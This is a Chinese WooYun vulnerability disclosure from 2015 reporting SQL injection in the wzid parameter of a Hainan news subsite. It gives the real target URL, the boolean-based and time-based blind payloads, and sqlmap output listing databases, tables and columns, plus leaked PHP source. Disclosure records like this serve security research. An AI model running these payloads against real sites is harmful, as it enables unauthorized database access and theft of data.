南海网某分站SQL注射[可读取代码] | wooyun-2015-0147830| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147830

漏洞标题：南海网某分站SQL注射[可读取代码]

漏洞作者：秦风

提交时间：2015-10-19 18:04

修复时间：2015-12-04 18:56

公开时间：2015-12-04 18:56

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-19：细节已通知厂商并且等待厂商处理中
2015-10-20：厂商已经确认，细节仅向厂商公开
2015-10-30：细节向核心白帽子及相关领域专家公开
2015-11-09：细节向普通白帽子公开
2015-11-19：细节向实习白帽子公开
2015-12-04：细节向公众公开

简要描述：

南海网分站

详细说明：

证券导报网络版

漏洞证明：

target URL:
http://zqdb2.hinews.cn/php/pages.php?wzid=1442
无单引号过滤

Parameter: wzid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: wzid=1442 AND 7171=7171
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: wzid=1442 AND (SELECT * FROM (SELECT(SLEEP(5)))YtRZ)
---
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] dbzqdb
[*] information_schema
[*] test
.......
back-end DBMS: MySQL 5.0.12
Database: dbzqdb
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| tb_wenzhang | 8746    |
| tb_lanmu    | 4936    |
| tb_huifu    | 2867    |
| tb_tiezi    | 1076    |
| tb_danyuan  | 267     |
| tb_yongh2   | 26      |
| tb_pinglun  | 25      |
| tb_daohang  | 24      |
| tb_daima    | 8       |
| tb_yongh    | 8       |
.................

从 tb_daima这张表可读取代码

Database: dbzqdb
Table: tb_daima
[4 columns]
+---------+-------------+
| Column  | Type        |
+---------+-------------+
| cmingch | varchar(50) |
| cneir   | text        |
| dzhid   | datetime    |
| nxuh    | int(11)     |
+---------+-------------+

代码片段(读取比较慢...-_-||)

<?php    include_once("../web_mysql.php");    inclu
de_once("../fun_danyuan.php");    include_once("../fun_dianj.php") ;      functi
on banshu(){      $date = '{%%ps_date%%}' ;      $lcsql = "select count(*) as 'cnt' from tb_lanmu where driq='".$date
."'" ;      global $db ;      $result_list = $db->sql_query($lcsql);      if(!$r
esult_list)        die("获???......

admin的账号密码:

修复方案：

你懂的 ^_^

版权声明：转载请注明来源秦风@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-10-20 18:54

厂商回复：

已处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147830

漏洞标题：南海网某分站SQL注射[可读取代码]

相关厂商：南海网

漏洞作者：秦风

提交时间：2015-10-19 18:04

修复时间：2015-12-04 18:56

公开时间：2015-12-04 18:56

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源秦风@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147830

漏洞标题：南海网某分站SQL注射[可读取代码]

相关厂商：南海网

漏洞作者： 秦风

提交时间：2015-10-19 18:04

修复时间：2015-12-04 18:56

公开时间：2015-12-04 18:56

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0147830"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 秦风@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：秦风

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源秦风@乌云